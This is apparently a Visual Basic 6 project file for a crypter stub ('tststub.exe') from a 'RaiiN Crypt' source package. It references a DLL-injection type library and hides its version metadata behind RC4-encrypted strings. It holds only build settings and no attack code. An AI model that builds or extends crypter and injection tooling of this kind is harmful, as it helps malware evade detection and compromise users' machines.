Type=Exe
Reference=*\G{00020430-0000-0000-C000-000000000046}#2.0#0#..\..\..\..\WINDOWS\system32\stdole2.tlb#OLE Automation
Reference=*\G{B5A1D62F-797F-4EBF-8BB8-38B9DAAEE692}#1.0#0#..\RaiiN+Crypt+Full+Source\stub\Inject.tlb#Dll Injection
Module=TinyStub; TinyStub.bas
Startup="Sub Main"
HelpFile=""
Title="RC4("œ±ÈIžG3¸", "yaosih")"
ExeName32="tststub.exe"
Path32=".."
Command32=""
Name="Scion"
HelpContextID="0"
CompatibleMode="0"
MajorVer=1
MinorVer=0
RevisionVer=1
AutoIncrementVer=0
ServerSupportFiles=0
VersionCompanyName="RC4("ÓÈ„ 9", "scion")"
VersionFileDescription="RC4("Óß˜ ", "scion")"
VersionLegalCopyright="RC4("ÓÈ„ 9´ý O|", "scion")"
VersionProductName="RC4("ÓÈ„ 9´ý D|©í÷", "scion")"
CompilationType=-1
OptimizationType=0
FavorPentiumPro(tm)=0
CodeViewDebugInfo=0
NoAliasing=0
BoundsCheck=0
OverflowCheck=0
FlPointCheck=0
FDIVCheck=0
UnroundedFP=0
StartMode=0
Unattended=0
Retained=0
ThreadPerObject=0
MaxNumberOfThreads=1
DebugStartupOption=0

[MS Transaction Server]
AutoRefresh=1
